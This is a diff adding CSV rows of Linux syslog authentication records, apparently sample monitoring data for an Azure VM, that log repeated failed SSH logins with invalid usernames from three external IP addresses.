+18885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:16,UbuntuDevEnv,2019-06-26 10:56:16,auth,UbuntuDevEnv,info,Disconnected from invalid user cisco 106.13.142.247 port 51356 [preauth],91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,106.13.142.2,51356,,
+18886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:16,UbuntuDevEnv,2019-06-26 10:56:16,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 51356:11: Bye Bye [preauth],91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,51356,,
+18887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:55,UbuntuDevEnv,2019-06-26 10:57:54,auth,UbuntuDevEnv,info,Invalid user mysqldump from 106.13.142.247 port 35382,91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysqldump,106.13.142.2,35382,,
+18888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:55,UbuntuDevEnv,2019-06-26 10:57:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:55,UbuntuDevEnv,2019-06-26 10:57:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:57,UbuntuDevEnv,2019-06-26 10:57:57,auth,UbuntuDevEnv,info,Failed password for invalid user mysqldump from 106.13.142.247 port 35382 ssh2,91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysqldump,106.13.142.2,35382,,
+18891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:58,UbuntuDevEnv,2019-06-26 10:57:57,auth,UbuntuDevEnv,info,Disconnected from invalid user mysqldump 106.13.142.247 port 35382 [preauth],91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysqldump,106.13.142.2,35382,,
+18892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:57:58,UbuntuDevEnv,2019-06-26 10:57:57,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 35382:11: Bye Bye [preauth],91563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,35382,,
+18893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:14,UbuntuDevEnv,2019-06-26 10:58:13,auth,UbuntuDevEnv,info,Invalid user dspace from 47.44.115.81 port 41994,91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,47.44.115.8,41994,,
+18894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:14,UbuntuDevEnv,2019-06-26 10:58:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:14,UbuntuDevEnv,2019-06-26 10:58:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:15,UbuntuDevEnv,2019-06-26 10:58:15,auth,UbuntuDevEnv,info,Invalid user user from 200.209.174.76 port 50481,91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.209.174.7,50481,,
+18897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:15,UbuntuDevEnv,2019-06-26 10:58:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:15,UbuntuDevEnv,2019-06-26 10:58:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:16,UbuntuDevEnv,2019-06-26 10:58:16,auth,UbuntuDevEnv,info,Failed password for invalid user dspace from 47.44.115.81 port 41994 ssh2,91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,47.44.115.8,41994,,
+18900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:16,UbuntuDevEnv,2019-06-26 10:58:16,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 41994:11: Bye Bye [preauth],91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,41994,,
+18901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:16,UbuntuDevEnv,2019-06-26 10:58:16,auth,UbuntuDevEnv,info,Disconnected from invalid user dspace 47.44.115.81 port 41994 [preauth],91629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,47.44.115.8,41994,,
+18902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:17,UbuntuDevEnv,2019-06-26 10:58:17,auth,UbuntuDevEnv,info,Failed password for invalid user user from 200.209.174.76 port 50481 ssh2,91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.209.174.7,50481,,
+18903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:17,UbuntuDevEnv,2019-06-26 10:58:17,auth,UbuntuDevEnv,info,Disconnected from invalid user user 200.209.174.76 port 50481 [preauth],91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.209.174.7,50481,,
+18904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:58:17,UbuntuDevEnv,2019-06-26 10:58:17,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 50481:11: Bye Bye [preauth],91643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,50481,,
+18905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:33,UbuntuDevEnv,2019-06-26 10:59:33,auth,UbuntuDevEnv,info,Invalid user app from 106.13.142.247 port 47648,91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,106.13.142.2,47648,,
+18906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:33,UbuntuDevEnv,2019-06-26 10:59:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:33,UbuntuDevEnv,2019-06-26 10:59:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:35,UbuntuDevEnv,2019-06-26 10:59:35,auth,UbuntuDevEnv,info,Failed password for invalid user app from 106.13.142.247 port 47648 ssh2,91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,106.13.142.2,47648,,
+18909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:36,UbuntuDevEnv,2019-06-26 10:59:35,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 47648:11: Bye Bye [preauth],91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,47648,,
+18910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:36,UbuntuDevEnv,2019-06-26 10:59:35,auth,UbuntuDevEnv,info,Disconnected from invalid user app 106.13.142.247 port 47648 [preauth],91912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,106.13.142.2,47648,,
+18911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:40,UbuntuDevEnv,2019-06-26 10:59:40,auth,UbuntuDevEnv,info,Invalid user esteban from 200.209.174.76 port 54711,91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,200.209.174.7,54711,,
+18912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:40,UbuntuDevEnv,2019-06-26 10:59:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:40,UbuntuDevEnv,2019-06-26 10:59:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:43,UbuntuDevEnv,2019-06-26 10:59:42,auth,UbuntuDevEnv,info,Failed password for invalid user esteban from 200.209.174.76 port 54711 ssh2,91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,200.209.174.7,54711,,
+18915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:43,UbuntuDevEnv,2019-06-26 10:59:42,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 54711:11: Bye Bye [preauth],91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,54711,,
+18916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:59:43,UbuntuDevEnv,2019-06-26 10:59:42,auth,UbuntuDevEnv,info,Disconnected from invalid user esteban 200.209.174.76 port 54711 [preauth],91945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,200.209.174.7,54711,,
+18917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:00:23,UbuntuDevEnv,2019-06-26 11:00:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81  user=test,92124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,47.44.115.8,,0,
+18918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:00:25,UbuntuDevEnv,2019-06-26 11:00:24,auth,UbuntuDevEnv,info,Failed password for test from 47.44.115.81 port 59244 ssh2,92124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,59244,,
+18919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:00:25,UbuntuDevEnv,2019-06-26 11:00:25,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 59244:11: Bye Bye [preauth],92124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,59244,,
+18920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:00:25,UbuntuDevEnv,2019-06-26 11:00:25,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 47.44.115.81 port 59244 [preauth],92124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,47.44.115.8,59244,,
+18921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:06,UbuntuDevEnv,2019-06-26 11:01:05,auth,UbuntuDevEnv,info,Invalid user soap from 200.209.174.76 port 58939,92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,200.209.174.7,58939,,
+18922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:06,UbuntuDevEnv,2019-06-26 11:01:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:06,UbuntuDevEnv,2019-06-26 11:01:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:08,UbuntuDevEnv,2019-06-26 11:01:08,auth,UbuntuDevEnv,info,Failed password for invalid user soap from 200.209.174.76 port 58939 ssh2,92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,200.209.174.7,58939,,
+18925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:08,UbuntuDevEnv,2019-06-26 11:01:08,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 58939:11: Bye Bye [preauth],92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,58939,,
+18926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:08,UbuntuDevEnv,2019-06-26 11:01:08,auth,UbuntuDevEnv,info,Disconnected from invalid user soap 200.209.174.76 port 58939 [preauth],92335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,200.209.174.7,58939,,
+18927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:11,UbuntuDevEnv,2019-06-26 11:01:10,auth,UbuntuDevEnv,info,Invalid user marry from 106.13.142.247 port 59904,92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marry,106.13.142.2,59904,,
+18928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:11,UbuntuDevEnv,2019-06-26 11:01:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:11,UbuntuDevEnv,2019-06-26 11:01:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:12,UbuntuDevEnv,2019-06-26 11:01:12,auth,UbuntuDevEnv,info,Failed password for invalid user marry from 106.13.142.247 port 59904 ssh2,92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marry,106.13.142.2,59904,,
+18931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:13,UbuntuDevEnv,2019-06-26 11:01:12,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 59904:11: Bye Bye [preauth],92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,59904,,
+18932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:01:13,UbuntuDevEnv,2019-06-26 11:01:12,auth,UbuntuDevEnv,info,Disconnected from invalid user marry 106.13.142.247 port 59904 [preauth],92352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marry,106.13.142.2,59904,,
+18933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:31,UbuntuDevEnv,2019-06-26 11:02:30,auth,UbuntuDevEnv,info,Invalid user admin from 47.44.115.81 port 48254,92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.44.115.8,48254,,
+18934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:31,UbuntuDevEnv,2019-06-26 11:02:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:31,UbuntuDevEnv,2019-06-26 11:02:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:33,UbuntuDevEnv,2019-06-26 11:02:32,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 47.44.115.81 port 48254 ssh2,92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.44.115.8,48254,,
+18937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:33,UbuntuDevEnv,2019-06-26 11:02:33,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 48254:11: Bye Bye [preauth],92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,48254,,
+18938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:33,UbuntuDevEnv,2019-06-26 11:02:33,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 47.44.115.81 port 48254 [preauth],92639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.44.115.8,48254,,
+18939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:50,UbuntuDevEnv,2019-06-26 11:02:49,auth,UbuntuDevEnv,info,Invalid user nagios from 106.13.142.247 port 43928,92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.142.2,43928,,
+18940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:50,UbuntuDevEnv,2019-06-26 11:02:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:50,UbuntuDevEnv,2019-06-26 11:02:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:52,UbuntuDevEnv,2019-06-26 11:02:52,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 106.13.142.247 port 43928 ssh2,92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.142.2,43928,,
+18943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:52,UbuntuDevEnv,2019-06-26 11:02:52,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 43928:11: Bye Bye [preauth],92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,43928,,
+18944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:02:52,UbuntuDevEnv,2019-06-26 11:02:52,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 106.13.142.247 port 43928 [preauth],92700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.142.2,43928,,
